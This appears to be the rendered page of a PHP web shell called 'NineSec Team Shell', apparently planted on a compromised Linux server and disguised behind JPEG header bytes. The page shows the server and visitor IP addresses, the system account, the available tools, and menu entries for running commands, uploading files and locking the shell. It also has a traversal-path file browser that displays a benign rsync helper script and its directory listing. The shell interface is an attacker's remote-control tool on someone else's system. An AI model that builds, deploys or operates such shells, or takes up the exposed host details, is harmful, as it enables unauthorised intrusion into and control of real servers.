�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.171
Web Server : Apache
System : Linux bob 6.17.4-2-pve #1 SMP PREEMPT_DYNAMIC PMX 6.17.4-2 (2025-12-19T07:49Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /media/../usr/share/javascript/../menu/../vim/../python3/../python3/../rsync/scripts/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //media/../usr/share/javascript/../menu/../vim/../python3/../python3/../rsync/scripts/cvs2includes
#!/usr/bin/perl
#
# This script finds all CVS/Entries files in the current directory and below
# and creates a local .cvsinclude file with non-inherited rules including each
# checked-in file.  Then, use this option whenever using --cvs-exclude (-C):
#
# 	-f ': .cvsinclude'
#
# That ensures that all checked-in files/dirs are included in the transfer.
# (You could alternately put ": .cvsinclude" into an .rsync-filter file and
# use the -F option, which is easier to type.)
#
# The downside is that you need to remember to re-run cvs2includes whenever
# you add a new file to the project.
use strict;

open(FIND, 'find . -name CVS -type d |') or die $!;
while (<FIND>) {
    chomp;
    s#^\./##;

    my $entries = "$_/Entries";
    s/CVS$/.cvsinclude/;
    my $filter = $_;

    open(ENTRIES, $entries) or die "Unable to open $entries: $!\n";
    my @includes;
    while (<ENTRIES>) {
	push(@includes, $1) if m#/(.+?)/#;
    }
    close ENTRIES;
    if (@includes) {
	open(FILTER, ">$filter") or die "Unable to write $filter: $!\n";
	print FILTER map "+ /$_\n", @includes;
	close FILTER;
	print "Updated $filter\n";
    } elsif (-f $filter) {
	unlink($filter);
	print "Removed $filter\n";
    }
}
close FIND;

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
April 25 2020 3:53:31
root
0755
atomic-rsync
3.901 KB
October 11 2008 6:30:26
root
0755
cull_options
2.386 KB
September 04 2014 10:44:50
root
0755
cvs2includes
1.184 KB
March 21 2007 2:51:54
root
0755
file-attr-restore
4.816 KB
December 20 2006 1:50:17
root
0755
files-to-excludes
0.521 KB
January 30 2006 10:52:17
root
0755
git-set-file-times
0.889 KB
January 13 2009 11:52:03
root
0755
logfilter
1.074 KB
October 04 2005 6:12:28
root
0755
lsh
2.206 KB
June 10 2013 4:40:56
root
0755
mnt-excl
1.801 KB
July 05 2011 1:32:06
root
0755
munge-symlinks
1.428 KB
November 27 2007 4:34:59
root
0755
rrsync
7.069 KB
September 14 2015 1:23:54
root
0755
rsyncstats
8.479 KB
September 01 2023 8:38:04
root
0755

NineSec Team - 2022